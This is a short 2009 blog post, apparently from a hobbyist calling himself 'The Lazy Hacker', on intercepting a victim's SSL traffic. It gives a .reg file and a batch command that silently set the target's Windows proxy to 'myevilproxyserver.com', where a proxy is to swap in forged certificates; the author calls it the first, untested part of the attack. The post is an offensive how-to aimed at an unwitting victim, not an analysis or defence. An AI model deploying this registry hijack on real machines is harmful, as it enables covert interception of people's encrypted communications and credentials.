Thursday, March 5, 2009

The Lazy Hacker Sniffing SSL traffic, maybe part 1:

So this is the first time I am posting, and haven't finished the project, so I am not certain if it works, I'll tell you in part 2. Anyways your probably thinking ssl is encrypted so how are you going to do this. Well we aren't going to break encryption. Instead we are going to send all there traffic to our evil proxy, where it will get any certs from. And our proxy will gobble up the certs it's supposed to get and hand the client machine a cert it made itself. So how are we going to do that, well we need to touch the client computer and do a registry edit. There are lots of languages you can do one in, I am just going to do this one in bat for times sake. It requires one .reg file which should contain:


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="myevilproxyserver.com"


And we should name it proxy.reg. And we will make one .bat file which will contain:


regedit.exe /s proxy.reg


You can also do this with the reg command and a hundred other ways but this is how I did it. Ok so that's all you need to do on the client machine, next week some time I will show you how to build the server that will eat this poor soul's traffic

No comments: